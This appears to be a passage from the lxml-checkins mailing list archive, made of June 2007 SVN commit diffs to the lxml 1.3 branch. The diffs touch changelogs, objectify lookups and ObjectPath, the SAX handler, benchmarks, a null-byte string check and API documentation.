xmlns="uri:a"><b></b></a>') + root = tree.getroot() self.assertRaises( TypeError, root.xpath, '//b', {None: 'uri:a'}) Modified: lxml/branch/lxml-1.3/src/lxml/tree.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tree.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/tree.pxd Tue Jun 12 18:06:23 2007 @@ -97,6 +97,7 @@ xmlAttr* properties xmlNs* ns xmlNs* nsDef + unsigned short line ctypedef struct xmlDtd: char* ExternalID @@ -198,6 +199,7 
@@ cdef xmlNs* xmlSearchNs(xmlDoc* doc, xmlNode* node, char* prefix) cdef xmlNs* xmlSearchNsByHref(xmlDoc* doc, xmlNode* node, char* href) cdef int xmlIsBlankNode(xmlNode* node) + cdef long xmlGetLineNo(xmlNode* node) cdef void xmlElemDump(FILE* f, xmlDoc* doc, xmlNode* cur) cdef void xmlNodeDumpOutput(xmlOutputBuffer* buf, xmlDoc* doc, xmlNode* cur, int level, From scoder at codespeak.net Tue Jun 12 18:10:05 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:10:05 +0200 (CEST) Subject: [Lxml-checkins] r44173 - lxml/branch/lxml-1.3 Message-ID: <20070612161005.5967E8188@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:10:03 2007 New Revision: 44173 Modified: lxml/branch/lxml-1.3/CHANGES.txt Log: missing ChangeLog entries Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 18:10:03 2007 @@ -2,6 +2,18 @@ lxml changelog ============== +Under development +================= + +Features added +-------------- + +* ``Element.values()`` to accompany the existing ``.keys()`` and ``.items()`` + +Bugs fixed +---------- + + 1.3beta (2007-02-27) ==================== From scoder at codespeak.net Tue Jun 12 18:15:00 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:15:00 +0200 (CEST) Subject: [Lxml-checkins] r44174 - in lxml/branch/lxml-1.3: . 
src/lxml src/lxml/tests Message-ID: <20070612161500.548978188@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:14:58 2007 New Revision: 44174 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/TODO.txt lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi lxml/branch/lxml-1.3/src/lxml/objectify.pyx lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Log: merged in revs 41642:41648 from trunk Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 18:14:58 2007 @@ -13,6 +13,8 @@ Bugs fixed ---------- +* Raise AssertionError when passing strings containing '\0' bytes + 1.3beta (2007-02-27) ==================== Modified: lxml/branch/lxml-1.3/TODO.txt ============================================================================== --- lxml/branch/lxml-1.3/TODO.txt (original) +++ lxml/branch/lxml-1.3/TODO.txt Tue Jun 12 18:14:58 2007 @@ -16,8 +16,6 @@ * more testing on multi-threading -* the code on extension functions and XSLT needs some refactoring - ElementTree ----------- @@ -34,8 +32,8 @@ Objectify --------- -* set special __attributes__ on ObjectifiedElement's as Python attributes, not - XML children +* emulate setting special __attributes__ on ObjectifiedElement's as Python + attributes, not XML children Features Modified: lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi Tue Jun 12 18:14:58 2007 @@ -537,6 +537,21 @@ c = s[0] return 0 +cdef int isutf8py(pystring): + cdef char* s + cdef char* c_end + cdef char c + s = _cstr(pystring) + c_end = s + python.PyString_GET_SIZE(pystring) + while s < c_end: + c = s[0] + if c == c'\0': + return -1 # invalid! 
+ if c & 0x80: + return 1 # non-ASCII + s = s + 1 + return 0 # plain 7-bit ASCII + cdef object funicode(char* s): cdef Py_ssize_t slen cdef char* spos @@ -555,7 +570,8 @@ cdef object _utf8(object s): if python.PyString_Check(s): - assert not isutf8(_cstr(s)), "All strings must be Unicode or ASCII" + assert not isutf8py(s), \ + "All strings must be Unicode or ASCII" return s elif python.PyUnicode_Check(s): return python.PyUnicode_AsUTF8String(s) @@ -581,10 +597,10 @@ if filename is None: return None elif python.PyString_Check(filename): - c_filename = _cstr(filename) - if not isutf8(c_filename): + if not isutf8py(filename): # plain ASCII! return filename + c_filename = _cstr(filename) try: # try to decode with default encoding filename = python.PyUnicode_Decode( Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/objectify.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/objectify.pyx Tue Jun 12 18:14:58 2007 @@ -42,8 +42,17 @@ cdef object AttributeError AttributeError = __builtin__.AttributeError +cdef object TypeError +TypeError = __builtin__.TypeError +cdef object ValueError +ValueError = __builtin__.ValueError cdef object IndexError IndexError = __builtin__.IndexError +cdef object StopIteration +StopIteration = __builtin__.StopIteration + +cdef object IGNORABLE_ERRORS +IGNORABLE_ERRORS = (ValueError, TypeError) cdef object list list = __builtin__.list @@ -202,7 +211,7 @@ """Return the (first) child with the given tag name. If no namespace is provided, the child will be looked up in the same one as self. """ - return _lookupChild(self, tag) + return _lookupChildOrRaise(self, tag) def __setattr__(self, tag, value): """Set the value of the (first) child with the given tag name. 
If no @@ -223,15 +232,14 @@ return tag = _buildChildTag(self, tag) - try: - element = _lookupChild(self, tag) - except AttributeError: + element = _lookupChild(self, tag) + if element is None: _appendValue(self, tag, value) else: _replaceElement(element, value) def __delattr__(self, tag): - child = _lookupChild(self, tag) + child = _lookupChildOrRaise(self, tag) self.remove(child) def addattr(self, tag, value): @@ -253,7 +261,7 @@ cdef tree.xmlNode* c_parent cdef tree.xmlNode* c_node if python._isString(key): - return _lookupChild(self, key) + return _lookupChildOrRaise(self, key) c_self_node = self._c_node c_parent = c_self_node.parent if c_parent is NULL: @@ -290,9 +298,8 @@ cdef tree.xmlNode* c_node if python._isString(key): key = _buildChildTag(self, key) - try: - element = _lookupChild(self, key) - except AttributeError: + element = _lookupChild(self, key) + if element is None: _appendValue(self, key, value) else: _replaceElement(element, value) @@ -421,10 +428,16 @@ c_href = _cstr(ns) c_result = _findFollowingSibling(c_node.children, c_href, c_tag, 0) if c_result is NULL: - raise AttributeError, "no such child: " + \ - cetree.namespacedNameFromNsName(c_href, c_tag) + return None return elementFactory(parent._doc, c_result) +cdef object _lookupChildOrRaise(_Element parent, tag): + element = _lookupChild(parent, tag) + if element is None: + raise AttributeError, "no such child: " + \ + _buildChildTag(parent, tag) + return element + cdef object _buildChildTag(_Element parent, tag): cdef char* c_href cdef char* c_tag @@ -910,16 +923,17 @@ """ types = [] known = set() + add_to_known = known.add for check, pytype in _TYPE_CHECKS: name = pytype.name if name not in known: - known.add(name) - types.append(pytype) + add_to_known(name) + python.PyList_Append(types, pytype) for pytype in _PYTYPE_DICT.itervalues(): name = pytype.name if name not in known: - known.add(name) - types.append(pytype) + add_to_known(name) + python.PyList_Append(types, pytype) return types cdef 
object _guessElementClass(tree.xmlNode* c_node): @@ -928,12 +942,11 @@ return None if value == '': return StringElement - errors = (ValueError, TypeError) for type_check, pytype in _TYPE_CHECKS: try: type_check(value) return (<PyType>pytype)._type - except errors: + except IGNORABLE_ERRORS: pass return None @@ -1426,7 +1439,6 @@ doc = element._doc ignore = bool(ignore_old) - _ValueError = ValueError StrType = _PYTYPE_DICT.get('str') c_node = element._c_node tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) @@ -1443,7 +1455,7 @@ try: if not (<PyType>pytype).type_check(value): pytype = None - except _ValueError: + except ValueError: pytype = None if pytype is None: @@ -1474,7 +1486,7 @@ if type_check(value) is not False: pytype = tested_pytype break - except _ValueError: + except ValueError: pass else: pytype = StrType @@ -1579,13 +1591,12 @@ strval = str(_value) if _pytype is None: - errors = (ValueError, TypeError) for type_check, pytype in _TYPE_CHECKS: try: type_check(strval) _pytype = (<PyType>pytype).name break - except errors: + except IGNORABLE_ERRORS: pass if _pytype is None: if _value is None: Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Tue Jun 12 18:14:58 2007 @@ -1196,6 +1196,15 @@ self.assertEquals(docinfo.root_name, 'html') self.assertEquals(docinfo.doctype, '') + def test_byte_zero(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", 'ha\0ho') + self.assertRaises(AssertionError, setattr, a, "tail", 'ha\0ho') + + self.assertRaises(AssertionError, Element, 'ha\0ho') + def test_encoding_tostring_utf16(self): # ElementTree fails to serialize this tostring = self.etree.tostring From scoder at codespeak.net Tue Jun 12 18:17:53 2007 From: scoder at codespeak.net (scoder at 
codespeak.net) Date: Tue, 12 Jun 2007 18:17:53 +0200 (CEST) Subject: [Lxml-checkins] r44175 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070612161753.E4E088189@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:17:53 2007 New Revision: 44175 Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx Log: cleanup Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 18:17:53 2007 @@ -1381,7 +1381,7 @@ cdef _ElementTree result result = baseclass() if context_node is None and doc is not None: - context_node = doc.getroot() + context_node = doc.getroot() if context_node is None: result._doc = doc result._context_node = context_node From scoder at codespeak.net Tue Jun 12 18:20:49 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:20:49 +0200 (CEST) Subject: [Lxml-checkins] r44176 - in lxml/branch/lxml-1.3: . doc src/lxml src/lxml/tests Message-ID: <20070612162049.06D3E8189@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:20:49 2007 New Revision: 44176 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/doc/objectify.txt lxml/branch/lxml-1.3/src/lxml/objectify.pyx lxml/branch/lxml-1.3/src/lxml/sax.py lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Log: merged in 41651:41955 from trunk Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 18:20:49 2007 @@ -8,6 +8,10 @@ Features added -------------- +* Support for custom Element class instantiation in lxml.sax + +* '.' 
represents empty ObjectPath (identity) + * ``Element.values()`` to accompany the existing ``.keys()`` and ``.items()`` Bugs fixed Modified: lxml/branch/lxml-1.3/doc/objectify.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/objectify.txt (original) +++ lxml/branch/lxml-1.3/doc/objectify.txt Tue Jun 12 18:20:49 2007 @@ -372,8 +372,8 @@ >>> print find(root).tag {ns}b -You can also use relative paths starting with a '.' that ignore the actual -root element and only inherit its namespace:: +You can also use relative paths starting with a '.' to ignore the actual root +element and only inherit its namespace:: >>> find = objectify.ObjectPath(".b[1]") >>> print find(root).tag @@ -395,6 +395,12 @@ ... AttributeError: no such child: {other}unknown +For convenience, a single dot represents the empty ObjectPath (identity):: + + >>> find = objectify.ObjectPath(".") + >>> print find(root).tag + {ns}root + ObjectPath objects can be used to manipulate trees:: >>> root = objectify.Element("{ns}root") Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/objectify.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/objectify.pyx Tue Jun 12 18:20:49 2007 @@ -1166,6 +1166,9 @@ r"(\.?)\s*(?:\{([^}]*)\})?\s*([^.{}\[\]\s]+)\s*(?:\[\s*([-0-9]+)\s*\])?", re.U).match +cdef object _RELATIVE_PATH_SEGMENT +_RELATIVE_PATH_SEGMENT = (None, None, 0) + cdef _parseObjectPathString(path): """Parse object path string into a 'hrefOnameOhrefOnameOOO' string and an index list. The index list is None if no index was used in the path. 
@@ -1173,6 +1176,8 @@ cdef int has_dot new_path = [] path = cetree.utf8(path.strip()) + if path == '.': + return [_RELATIVE_PATH_SEGMENT] path_pos = 0 while python.PyString_GET_SIZE(path) > 0: match = __MATCH_PATH_SEGMENT(path, path_pos) @@ -1188,7 +1193,7 @@ if python.PyList_GET_SIZE(new_path) == 0: if has_dot: # path '.child' => ignore root - python.PyList_Append(new_path, (None, None, 0)) + python.PyList_Append(new_path, _RELATIVE_PATH_SEGMENT) elif index != 0: raise ValueError, "index not allowed on root node" elif not has_dot: @@ -1234,9 +1239,7 @@ if python.PyList_GET_SIZE(new_path) == 0 and index != 0: raise ValueError, "index not allowed on root node" python.PyList_Append(new_path, (ns, name, index)) - if python.PyList_GET_SIZE(new_path) == 0 or \ - (python.PyList_GET_SIZE(new_path) == 1 and \ - new_path[0] == (None, None, 0)): + if python.PyList_GET_SIZE(new_path) == 0: raise ValueError, "invalid path" return new_path Modified: lxml/branch/lxml-1.3/src/lxml/sax.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/sax.py (original) +++ lxml/branch/lxml-1.3/src/lxml/sax.py Tue Jun 12 18:20:49 2007 @@ -13,12 +13,15 @@ class ElementTreeContentHandler(object, ContentHandler): """Build an lxml ElementTree from SAX events. """ - def __init__(self): + def __init__(self, makeelement=None): self._root = None self._element_stack = [] self._default_ns = None self._ns_mapping = { None : [None] } self._new_mappings = {} + if makeelement is None: + makeelement = Element + self._makeelement = makeelement def _get_etree(self): "Contains the generated ElementTree after parsing is finished." 
@@ -77,7 +80,8 @@ element_stack = self._element_stack if self._root is None: - element = self._root = Element(el_name, attrs, self._new_mappings) + element = self._root = \ + self._makeelement(el_name, attrs, self._new_mappings) else: element = SubElement(element_stack[-1], el_name, attrs, self._new_mappings) Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Tue Jun 12 18:20:49 2007 @@ -593,6 +593,16 @@ path = objectify.ObjectPath( "root.c1[1].c2" ) self.assertFalse(path.hasattr(root)) + def test_object_path_dot(self): + root = self.XML(xml_str) + path = objectify.ObjectPath( "." ) + self.assertEquals(root.c1.c2.text, path(root).c1.c2.text) + + def test_object_path_dot_list(self): + root = self.XML(xml_str) + path = objectify.ObjectPath( [''] ) + self.assertEquals(root.c1.c2.text, path(root).c1.c2.text) + def test_object_path_dot_root(self): root = self.XML(xml_str) path = objectify.ObjectPath( ".c1.c2" ) @@ -652,9 +662,7 @@ ['root[2]', 'c1', 'c2']) self.assertRaises(ValueError, objectify.ObjectPath, - ".") - self.assertRaises(ValueError, objectify.ObjectPath, - ['']) + []) self.assertRaises(ValueError, objectify.ObjectPath, ['', '', '']) From scoder at codespeak.net Tue Jun 12 18:28:51 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:28:51 +0200 (CEST) Subject: [Lxml-checkins] r44178 - in lxml/branch/lxml-1.3: . 
benchmark doc doc/html src/lxml src/lxml/tests Message-ID: <20070612162851.4E864818D@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:28:50 2007 New Revision: 44178 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/benchmark/bench_etree.py lxml/branch/lxml-1.3/benchmark/bench_objectify.py lxml/branch/lxml-1.3/benchmark/bench_xpath.py lxml/branch/lxml-1.3/benchmark/benchbase.py lxml/branch/lxml-1.3/doc/api.txt lxml/branch/lxml-1.3/doc/html/style.css lxml/branch/lxml-1.3/doc/mkhtml.py lxml/branch/lxml-1.3/doc/performance.txt lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Log: merged in revs 42061:42203 from trunk Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 18:28:50 2007 @@ -8,6 +8,8 @@ Features added -------------- +* Element.attrib now has a ``pop()`` method + * Support for custom Element class instantiation in lxml.sax * '.' 
represents empty ObjectPath (identity) Modified: lxml/branch/lxml-1.3/benchmark/bench_etree.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/bench_etree.py (original) +++ lxml/branch/lxml-1.3/benchmark/bench_etree.py Tue Jun 12 18:28:50 2007 @@ -3,7 +3,7 @@ from StringIO import StringIO import benchbase -from benchbase import with_attributes, with_text, onlylib, serialized +from benchbase import with_attributes, with_text, onlylib, serialized, children ############################################################ # Benchmarks @@ -77,8 +77,10 @@ root1.append(el) def bench_insert_from_document(self, root1, root2): + pos = len(root1)/2 for el in root2: - root1.insert(len(root1)/2, el) + root1.insert(pos, el) + pos = pos + 1 def bench_rotate_children(self, root): # == "1 2 3" # runs on any single tree independently @@ -102,18 +104,21 @@ def bench_clear(self, root): root.clear() - def bench_has_children(self, root): - for child in root: + @children + def bench_has_children(self, children): + for child in children: if child and child and child and child and child: pass - def bench_len(self, root): - for child in root: + @children + def bench_len(self, children): + for child in children: map(len, repeat(child, 20)) - def bench_create_subelements(self, root): + @children + def bench_create_subelements(self, children): SubElement = self.etree.SubElement - for child in root: + for child in children: SubElement(child, '{test}test') def bench_append_elements(self, root): @@ -122,103 +127,120 @@ el = Element('{test}test') child.append(el) - def bench_makeelement(self, root): + @children + def bench_makeelement(self, children): empty_attrib = {} - for child in root: + for child in children: child.makeelement('{test}test', empty_attrib) - def bench_create_elements(self, root): + @children + def bench_create_elements(self, children): Element = self.etree.Element - for child in root: + for child in children: 
Element('{test}test') - def bench_replace_children_element(self, root): + @children + def bench_replace_children_element(self, children): Element = self.etree.Element - for child in root: + for child in children: el = Element('{test}test') child[:] = [el] - def bench_replace_children(self, root): - Element = self.etree.Element - for child in root: - child[:] = [ child[0] ] + @children + def bench_replace_children(self, children): + els = [ self.etree.Element("newchild") ] + for child in children: + child[:] = els def bench_remove_children(self, root): for child in root: root.remove(child) def bench_remove_children_reversed(self, root): - for child in reversed(root[:]): + for child in reversed(root): root.remove(child) - def bench_set_attributes(self, root): - for child in root: + @children + def bench_set_attributes(self, children): + for child in children: child.set('a', 'bla') @with_attributes(True) - def bench_get_attributes(self, root): - for child in root: + @children + def bench_get_attributes(self, children): + for child in children: child.get('bla1') child.get('{attr}test1') - def bench_setget_attributes(self, root): - for child in root: + @children + def bench_setget_attributes(self, children): + for child in children: child.set('a', 'bla') - for child in root: + for child in children: child.get('a') def bench_root_getchildren(self, root): root.getchildren() - def bench_getchildren(self, root): - for child in root: + @children + def bench_getchildren(self, children): + for child in children: child.getchildren() - def bench_get_children_slice(self, root): - for child in root: + @children + def bench_get_children_slice(self, children): + for child in children: child[:] - def bench_get_children_slice_2x(self, root): - for child in root: - children = child[:] + @children + def bench_get_children_slice_2x(self, children): + for child in children: + child[:] child[:] - def bench_deepcopy(self, root): - for child in root: + @children + def bench_deepcopy(self, 
children): + for child in children: copy.deepcopy(child) def bench_deepcopy_all(self, root): copy.deepcopy(root) - def bench_tag(self, root): - for child in root: + @children + def bench_tag(self, children): + for child in children: child.tag - def bench_tag_repeat(self, root): - for child in root: + @children + def bench_tag_repeat(self, children): + for child in children: for i in repeat(0, 100): child.tag @with_text(utext=True, text=True, no_text=True) - def bench_text(self, root): - for child in root: + @children + def bench_text(self, children): + for child in children: child.text @with_text(utext=True, text=True, no_text=True) - def bench_text_repeat(self, root): + @children + def bench_text_repeat(self, children): repeat = range(500) - for child in root: + for child in children: for i in repeat: child.text - def bench_set_text(self, root): + @children + def bench_set_text(self, children): text = TEXT - for child in root: + for child in children: child.text = text - def bench_set_utext(self, root): + @children + def bench_set_utext(self, children): text = UTEXT - for child in root: + for child in children: child.text = text @onlylib('lxe') Modified: lxml/branch/lxml-1.3/benchmark/bench_objectify.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/bench_objectify.py (original) +++ lxml/branch/lxml-1.3/benchmark/bench_objectify.py Tue Jun 12 18:28:50 2007 @@ -10,6 +10,9 @@ ############################################################ class BenchMark(benchbase.BenchMarkBase): + repeat1000 = range(1000) + repeat3000 = range(3000) + def __init__(self, lib): from lxml import etree, objectify self.objectify = objectify @@ -20,37 +23,37 @@ def bench_attribute(self, root): "1 2 4" - for i in repeat(None, 3000): + for i in self.repeat3000: root.zzzzz def bench_attribute_cached(self, root): "1 2 4" cache = root.zzzzz - for i in repeat(None, 3000): + for i in self.repeat3000: root.zzzzz def 
bench_attributes_deep(self, root): "1 2 4" - for i in repeat(None, 3000): + for i in self.repeat3000: root.zzzzz['{cdefg}z00000'] def bench_attributes_deep_cached(self, root): "1 2 4" cache1 = root.zzzzz cache2 = cache1['{cdefg}z00000'] - for i in repeat(None, 3000): + for i in self.repeat3000: root.zzzzz['{cdefg}z00000'] def bench_objectpath(self, root): "1 2 4" path = self.objectify.ObjectPath(".zzzzz") - for i in repeat(None, 3000): + for i in self.repeat3000: path(root) def bench_objectpath_deep(self, root): "1 2 4" path = self.objectify.ObjectPath(".zzzzz.{cdefg}z00000") - for i in repeat(None, 3000): + for i in self.repeat3000: path(root) def bench_objectpath_deep_cached(self, root): @@ -58,7 +61,7 @@ cache1 = root.zzzzz cache2 = cache1['{cdefg}z00000'] path = self.objectify.ObjectPath(".zzzzz.{cdefg}z00000") - for i in repeat(None, 3000): + for i in self.repeat3000: path(root) @with_text(text=True, utext=True, no_text=True) @@ -72,7 +75,7 @@ def bench_type_inference(self, root): "1 2 4" el = root.aaaaa - for i in repeat(None, 1000): + for i in self.repeat1000: el.getchildren() @with_text(text=True) @@ -80,7 +83,7 @@ "1 2 4" el = root.aaaaa self.objectify.annotate(el) - for i in repeat(None, 1000): + for i in self.repeat1000: el.getchildren() Modified: lxml/branch/lxml-1.3/benchmark/bench_xpath.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/bench_xpath.py (original) +++ lxml/branch/lxml-1.3/benchmark/bench_xpath.py Tue Jun 12 18:28:50 2007 @@ -3,7 +3,7 @@ from StringIO import StringIO import benchbase -from benchbase import with_attributes, with_text, onlylib, serialized +from benchbase import with_attributes, with_text, onlylib, serialized, children ############################################################ # Benchmarks @@ -11,14 +11,16 @@ class XPathBenchMark(benchbase.BenchMarkBase): @onlylib('lxe') - def bench_xpath_class(self, root): + @children + def bench_xpath_class(self, 
children): xpath = self.etree.XPath("./*[0]") - for child in root: + for child in children: xpath(child) @onlylib('lxe') - def bench_xpath_class_repeat(self, root): - for child in root: + @children + def bench_xpath_class_repeat(self, children): + for child in children: xpath = self.etree.XPath("./*[0]") xpath(child) @@ -29,12 +31,14 @@ xpath.evaluate("./*[0]") @onlylib('lxe') - def bench_xpath_method(self, root): - for child in root: + @children + def bench_xpath_method(self, children): + for child in children: child.xpath("./*[0]") @onlylib('lxe') - def bench_xpath_old_extensions(self, root): + @children + def bench_xpath_old_extensions(self, children): def return_child(_, element): if element: return element[0] @@ -42,11 +46,12 @@ return () extensions = {(None, 'child') : return_child} xpath = self.etree.XPath("child(.)", extensions=extensions) - for child in root: + for child in children: xpath(child) @onlylib('lxe') - def bench_xpath_extensions(self, root): + @children + def bench_xpath_extensions(self, children): def return_child(_, element): if element: return element[0] @@ -56,7 +61,7 @@ try: xpath = self.etree.XPath("test:t(.)", {"test":"test"}) - for child in root: + for child in children: xpath(child) finally: del self.etree.FunctionNamespace("test")["t"] Modified: lxml/branch/lxml-1.3/benchmark/benchbase.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/benchbase.py (original) +++ lxml/branch/lxml-1.3/benchmark/benchbase.py Tue Jun 12 18:28:50 2007 @@ -78,6 +78,11 @@ function.STRING = True return function +def children(function): + "Decorator for benchmarks that require a list of root children" + function.CHILDREN = True + return function + ############################################################ # benchmark baseclass ############################################################ @@ -105,13 +110,18 @@ deepcopy = copy.deepcopy def set_property(root, fname): xml = 
self._serialize_tree(root) - setattr(self, fname, lambda : etree.XML(xml, etree_parser)) + if etree_parser is not None: + setattr(self, fname, lambda : etree.XML(xml, etree_parser)) + else: + setattr(self, fname, lambda : deepcopy(root)) setattr(self, fname + '_xml', lambda : xml) + setattr(self, fname + '_children', lambda : root[:]) else: def set_property(root, fname): setattr(self, fname, self.et_make_clone_factory(root)) xml = self._serialize_tree(root) setattr(self, fname + '_xml', lambda : xml) + setattr(self, fname + '_children', lambda : root[:]) attribute_list = list(izip(count(), ({}, _ATTRIBUTES))) text_list = list(izip(count(), (None, _TEXT, _UTEXT))) @@ -131,10 +141,12 @@ def _tree_builder_name(self, tree, tn, an): return '_root%d_T%d_A%d' % (tree, tn, an) - def tree_builder(self, tree, tn, an, serial): + def tree_builder(self, tree, tn, an, serial, children): name = self._tree_builder_name(tree, tn, an) if serial: name += '_xml' + elif children: + name += '_children' return getattr(self, name) def _serialize_tree(self, root): @@ -270,13 +282,14 @@ arg_count = 1 tree_tuples = self._permutations(all_trees, arg_count) - serialized = getattr(method, 'STRING', False) + serialized = getattr(method, 'STRING', False) + children = getattr(method, 'CHILDREN', False) for tree_tuple in tree_tuples: for tn in sorted(getattr(method, 'TEXT', (0,))): for an in sorted(getattr(method, 'ATTRIBUTES', (0,))): benchmarks.append((name, method_call, tree_tuple, - tn, an, serialized)) + tn, an, serialized, children)) return benchmarks @@ -315,11 +328,12 @@ return (benchmark_suites, benchmarks) -def build_treeset_name(trees, tn, an, serialized): +def build_treeset_name(trees, tn, an, serialized, children): text = {0:'-', 1:'S', 2:'U'}[tn] attr = {0:'-', 1:'A'}[an] ser = {True:'X', False:'T'}[serialized] - return "%s%s%s T%s" % (text, attr, ser, ',T'.join(imap(str, trees))[:6]) + chd = {True:'C', False:'R'}[children] + return "%s%s%s%s T%s" % (text, attr, ser, chd, 
',T'.join(imap(str, trees))[:6]) def printSetupTimes(benchmark_suites): print "Setup times for trees in seconds:" @@ -327,20 +341,20 @@ print "%-3s: " % b.lib_name, for an in (0,1): for tn in (0,1,2): - print ' %s ' % build_treeset_name((), tn, an, False)[:2], + print ' %s ' % build_treeset_name((), tn, an, False, False)[:2], print for i, tree_times in enumerate(b.setup_times): print " T%d:" % (i+1), ' '.join("%6.4f" % t for t in tree_times) print -def runBench(suite, method_name, method_call, tree_set, tn, an, serial): +def runBench(suite, method_name, method_call, tree_set, tn, an, serial, children): if method_call is None: raise SkippedTest current_time = time.time call_repeat = range(10) - tree_builders = [ suite.tree_builder(tree, tn, an, serial) + tree_builders = [ suite.tree_builder(tree, tn, an, serial, children) for tree in tree_set ] times = [] @@ -348,14 +362,17 @@ for i in range(3): gc.collect() gc.disable() - t = 0 + t = -1 for i in call_repeat: args = [ build() for build in tree_builders ] t_one_call = current_time() method_call(*args) - t += current_time() - t_one_call - t = 1000.0 * t / len(call_repeat) - times.append(t) + t_one_call = current_time() - t_one_call + if t < 0: + t = t_one_call + else: + t = min(t, t_one_call) + times.append(1000.0 * t) gc.enable() del args return times @@ -364,7 +381,7 @@ for bench_calls in izip(*benchmarks): for lib, (bench, benchmark_setup) in enumerate(izip(benchmark_suites, bench_calls)): bench_name = benchmark_setup[0] - tree_set_name = build_treeset_name(*benchmark_setup[-4:]) + tree_set_name = build_treeset_name(*benchmark_setup[-5:]) print "%-3s: %-28s" % (bench.lib_name, bench_name[6:34]), print "(%-10s)" % tree_set_name, sys.stdout.flush() Modified: lxml/branch/lxml-1.3/doc/api.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/api.txt (original) +++ lxml/branch/lxml-1.3/doc/api.txt Tue Jun 12 18:28:50 2007 @@ -31,8 +31,9 @@ 3 Trees and Documents 4 
Iteration 5 Error handling on exceptions - 6 xinclude - 7 write_c14n on ElementTree + 6 Serialisation + 7 xinclude + 8 write_c14n on ElementTree lxml.etree @@ -62,17 +63,16 @@ While lxml.etree itself uses the ElementTree API, it is possible to replace the Element implementation by `custom element subclasses`_. This has been -used to implement well-known XML APIs on top of lxml. The ``lxml.elements`` -package contains examples. Currently, there is a data-binding implementation -called `objectify`_, which is similar to the `Amara bindery`_ tool. - -Additionally, the `lxml.elements.classlookup`_ module provides a number of -different schemes to customize the mapping between libxml2 nodes and the -Element classes used by lxml.etree. +used to implement well-known XML APIs on top of lxml. For example, lxml ships +with a data-binding implementation called `objectify`_, which is similar to +the `Amara bindery`_ tool. + +lxml.etree comes with a number of `different lookup schemes`_ to customize the +mapping between libxml2 nodes and the Element classes used by lxml.etree. .. _`custom element subclasses`: namespace_extensions.html .. _`objectify`: objectify.html -.. _`lxml.elements.classlookup`: elements.html#lxml.elements.classlookup +.. _`different lookup schemes`: element_classes.html#setting-up-a-class-lookup-scheme .. _`Amara bindery`: http://uche.ogbuji.net/tech/4suite/amara/ @@ -228,7 +228,36 @@ etc. which are described in their respective sections below. -xinclude +Serialisation +------------- + +lxml.etree has direct support for pretty printing XML output. Functions like +``ElementTree.write()`` and ``tostring()`` support it through a keyword +argument:: + + >>> root = etree.XML("<root><test/></root>") + >>> print etree.tostring(root) + <root><test/></root> + + >>> print etree.tostring(root, pretty_print=True) + <root> + <test/> + </root> + +By default, lxml (and ElementTree) output the XML declaration only if it is +required. 
